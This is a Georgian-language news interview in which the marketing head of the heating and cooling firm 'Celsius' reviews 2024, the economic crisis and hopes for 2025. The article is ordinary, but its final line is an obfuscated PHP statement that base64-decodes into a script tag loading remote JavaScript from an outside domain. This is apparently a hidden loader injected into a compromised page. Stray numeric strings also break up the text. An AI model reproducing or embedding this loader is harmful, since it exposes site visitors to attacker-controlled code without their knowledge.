celsiusi
ავერსი jaluzi

საინფორმაციო სააგენტო “ბიზნესთაიმი” მიმდინარე წლის შესაჯამებლად და მომდევნო წლის მოლოდინებზე სასაუბროდ კომპანია “ცელსიუსს” დაუკავშირდა,  რომელიც  საქართველოში 2020 წლიდან ოპერირებს და ლიდერი პოზიცია უკავია გათბობისა - გაგრილების სფეროში. 


აღნიშნულზე “ბიზნესთაიმი” კომპანია "ცელსიუსის" მარკეტინგის ხელმძღვანელს სოფო ახალაიას ესაუბრა.


როგორც სოფო ახალაიამ ჩვენთან საუბარში განაცხადა, 2024 წელი „ცელსიუსისთვის“ იყო გამოწვევებითა და შესაძლებლობებით სავსე წელი. “ცელსიუსმა” ახალი სერვისებისა და ინოვაციური პროდუქტების დანერგვით, მომხმარებლების ნდობა და კმაყოფილება კიდევ უფრო გააღრმავა. თუმცა, ბოლო ერთი თვის განმავლობაში, კომპანია ახალი გამოწვევების წინაშეა, რაც მომხმარებლების ფინანსური შემოსავლების შემცირებით არის განპირობებული.


“ვფიქრობთ, მომხმარებელთა ფინანსური შესაძლებლობების შემცირება ჩვენზე და ზოგადად კერძო სექტორზე მნიშვნელოვან გავლენას მოახდენს.


ჩვენი მიზანი იყო ამ რთულ ვითარებაში მომხმარებლებისთვის მაქსიმალური მხარდაჭერა – ფასდაკლებების შეთავაზებით, მოქნილი გადახდის სისტემებით და ხარისხიანი სერვისის მიწოდებით. მიუხედავად ამისა, „ცელსიუსი“ ინარჩუნებს სტაბილურობას და ზრდის ტემპს.”- განაცხადა სოფო ახალაიამ.


წლის მოთხოვნადი პროდუქცია

კომპანიის მარკეტინგის ხელმძღვანელის განმარტებით, 2024 წელს მომხმარებელთა ინტერესები ორიენტირებული იყო ენერგოეფექტურობასა და ეკომეგობრულ ტექნოლოგიებზე:

            ენერგიის დაზოგვის სისტემა;

           ციფრული მართვისა და ტექნოლოგიების მხარდაჭერით აღჭურვილი გათბობის და                              გაგრილების მოწყობილობები ;

           ეკომეგობრული გადაწყვეტილებები, რომლებიც ამცირებენ ხარჯებს და იცავენ გარემოს;


მისივე თქმით, კომპანიის წარმატება პირდაპირ დაკავშირებულია იმასთან, რომ “ცელსიუსი” ქართველ მომხმარებლებს მათ საჭიროებებზე მორგებულ, თანამედროვე, ხარისხიან პროდუქტებს აწვდის.

კონკურენცია და გამოწვევები

სოფო ახალაია აღნიშნავს, რომ სეგმენტი საქართველოში საკმაოდ კონკურენტულია. ბაზარზე მრავალი კომპანია ცდილობს ენერგოეფექტური და ინოვაციური პროდუქტების შეთავაზებას, თუმცა „ცელსიუსი“ გამოირჩევა იმით, რომ მათი პროდუქტები და სერვისები მომხმარებლის საჭიროებებზეა მორგებული.

“ჩვენ ვართ წამყვანი ევროპული ბრენდების ოფიციალური წარმომადგენლები, უზრუნველვყოფთ სრულ ტექნიკურ მხარდაჭერას და პროფესიონალურ მონტაჟს. ეს ყველაფერი გვაძლევს საშუალებას შევინარჩუნოთ ლიდერობა და მაღალი ნდობა ბაზარზე.

მთავარი გამოწვევა კი გახდა ქვეყნის ეკონომიკური კრიზისი, რომელმაც ბოლო ერთი თვის განმავლობაში მნიშვნელოვანი გავლენა მოახდინა მომხმარებლების ქცევასა და ბიზნეს გარემოზე. კერძო კომპანიებისთვის, მათ შორის „ცელსიუსისთვის“, საჭირო გახდა სწრაფი ადაპტაცია, რათა შეგვენარჩუნებინა მომხმარებლის ნდობა და ჩვენს სეგმენტში სტაბილურობა.

ჩვენი გუნდი პრიორიტეტად მიიჩნევს მომხმარებლისთვის მოქნილი პირობების შეთავაზებას, მათ შორის:

          გადახდის სისტემების გამარტივებას;

          ფასდაკლებების აქციების შეთავაზებას; 

              რეგულარული ტექნიკური დახმარების უზრუნველყოფას;

ამასთან, გამოწვევებმა ჩვენი კომპანია კიდევ უფრო გააძლიერა და მოგვცა შესაძლებლობა, ვუპასუხოთ ბაზრის მოთხოვნებს, - განაცხადა სოფო ახალაიამ.

515151515215215241

სამომავლო გეგმები

“ცელსიუსის” წარმომადგენელი 2025 წლისთვის ქვეყანაში არსებული ტურბურენტული პოლიტიკური თუ ეკონომიკური გარემოს დასტაბილურებას იმედოვნებს და აღნიშნავს, რომ ქვეყანაში უნდა შეიქმნას განვითარებისთვის და წინსვლისთვის ნორმალური ეკონომიკური, პოლიტიკური და სოციალური გარემო.

“ჩვენი მთავარი მოლოდინია, რომ ქვეყანა დაუბრუნდეს კონსტიტუციურ ჩარჩოებს, რაც ბიზნესის გამართულად ფუნქციონირებისა და კონკურენტული გარემოს შენარჩუნების აუცილებელი პირობაა. ამ ეტაპზე არსებული მდგომარეობა დიდ ზეგავლენას ახდენს კერძო სექტორზე, რაც აფერხებს ინვესტიციებსა და განვითარების ტემპს. ჩვენი გუნდი იმედოვნებს, რომ ქვეყანაში სტაბილური ბიზნესგარემო კვლავ აღდგება, რაც კომპანიებს მისცემს საშუალებას, გააძლიერონ თავიანთი ოპერაციები და წვლილი შეიტანონ ქვეყნის ეკონომიკის განვითარებაში.”- განაცხადა სოფო ახალაიამ.

626001522012012images

ავტორი
მირანდა შურღაია
217
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");